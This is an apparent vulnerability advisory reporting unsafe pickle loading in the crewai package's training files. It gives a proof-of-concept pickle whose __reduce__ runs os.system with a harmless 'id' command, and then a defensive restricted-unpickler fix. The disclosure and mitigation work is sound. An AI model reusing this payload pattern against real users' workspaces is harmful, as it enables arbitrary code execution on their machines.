Description
Advisory Details
- Package ecosystem: pip
- Package name: crewai
- Affected versions: <= 0.108.0
- Patched versions: (none)
- Severity: High
- CWE: CWE-502 (Deserialization of Untrusted Data)
Summary
PickleHandler.load() in crewai/utilities/file_handler.py:180 calls pickle.load() on hardcoded filenames (training_data.pkl, trained_agents_data.pkl) resolved relative to the current working directory. These files are loaded automatically during agent execution. An attacker who can place a malicious pickle file in that directory (e.g., via a cloned repository or a shared workspace) achieves instant RCE.
PoC
```python
import pickle
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('id > /tmp/pwned',))

with open('training_data.pkl', 'wb') as f:
    pickle.dump(Exploit(), f)

from crewai import Crew, Agent, Task
agent = Agent(role='test', goal='test', backstory='test')
task = Task(description='test', agent=agent, expected_output='test')
crew = Crew(agents=[agent], tasks=[task])
crew.train(n_iterations=1, filename='training_data.pkl')
# RCE triggered - check /tmp/pwned
```
Impact
Any user running CrewAI in a directory containing a malicious pickle file faces immediate remote code execution. This is exploitable via cloned repositories, shared workspaces, or any scenario where an attacker can write files to the working directory.
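The root cause is that a stock pickle.Unpickler resolves any global a file names (here os.system) and calls it. The following is an added example, not crewai's code, of the mitigation a maintainer would apply: a restricted unpickler whose find_class only resolves an explicit allowlist, so a training-data file can only contain plain data. The names RestrictedUnpickler, restricted_loads, load_training_data and the sample payloads are assumptions made for this illustration; the hostile sample references the harmless os.getcwd rather than a shell command, which is enough to show the rejection path.

```python
import io
import os
import pickle
from collections import OrderedDict

# Hypothetical allowlist: only globals that are pure data containers may be
# resolved. Builtin dicts, lists, tuples, strings and numbers never go through
# find_class at all, so the list can stay very small.
SAFE_GLOBALS = {("collections", "OrderedDict")}

class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to resolve any module.name pair that is not allowlisted."""
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def load_training_data(path: str):
    """Hardened replacement for loading a training_data.pkl from disk."""
    with open(path, "rb") as f:
        return restricted_loads(f.read())

class _CallsGetcwd:
    """Constructed sample: a reduce target that names a global (os.getcwd).
    A stock Unpickler would resolve and call it; the restricted one refuses."""
    def __reduce__(self):
        return (os.getcwd, ())

def demo():
    # Constructed benign payload: only an allowlisted container plus plain data.
    benign = pickle.dumps(OrderedDict(iterations=3, scores=[0.5, 0.7]))
    # Constructed hostile payload: asks the unpickler to resolve a global.
    hostile = pickle.dumps(_CallsGetcwd())
    results = {"benign": restricted_loads(benign)}
    try:
        restricted_loads(hostile)
        results["hostile"] = "loaded"
    except pickle.UnpicklingError:
        results["hostile"] = "rejected"
    return results

if __name__ == "__main__":
    print(demo())  # benign data loads; the hostile pickle is rejected
```

The same allowlist approach works for trained_agents_data.pkl; the stricter fix is to drop pickle for these files in favour of a data-only format such as JSON.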